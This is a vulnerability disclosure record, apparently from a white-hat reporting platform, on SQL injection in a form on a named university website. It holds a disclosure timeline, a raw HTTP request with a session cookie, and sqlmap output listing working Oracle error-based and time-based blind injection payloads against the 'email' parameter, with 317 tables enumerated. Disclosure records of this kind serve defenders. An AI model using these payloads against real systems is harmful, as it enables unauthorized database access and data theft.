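2015-11-08: Details reported to the vendor; awaiting vendor handling
2015-11-10: Vendor confirmed; details disclosed to the vendor only
2015-11-20: Details disclosed to core white hats and experts in related fields
2015-11-30: Details disclosed to regular white hats
2015-12-10: Details disclosed to intern white hats
2015-12-25: Details disclosed to the public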
POST /sggl/wsjj/mmzh.jsp HTTP/1.1
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
Referer: http://jingjia.ecnu.edu.cn
Cookie: JSESSIONID=CFCB2542C85EB9F5DB8A9BEFCAFA1BDB
Host: jingjia.ecnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

email=1&xm=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: email=1' AND 8844=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(118)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8844=8844) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(106)||CHR(118)||CHR(113)) AND 'OJmn'='OJmn&xm=1

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: email=1' AND 2558=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(106)||CHR(104)||CHR(108),5) AND 'mcWd'='mcWd&xm=1
---
back-end DBMS: Oracle
Database: ZC
[317 tables]
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-10 08:22
Notified the second-level unit to handle it.
None yet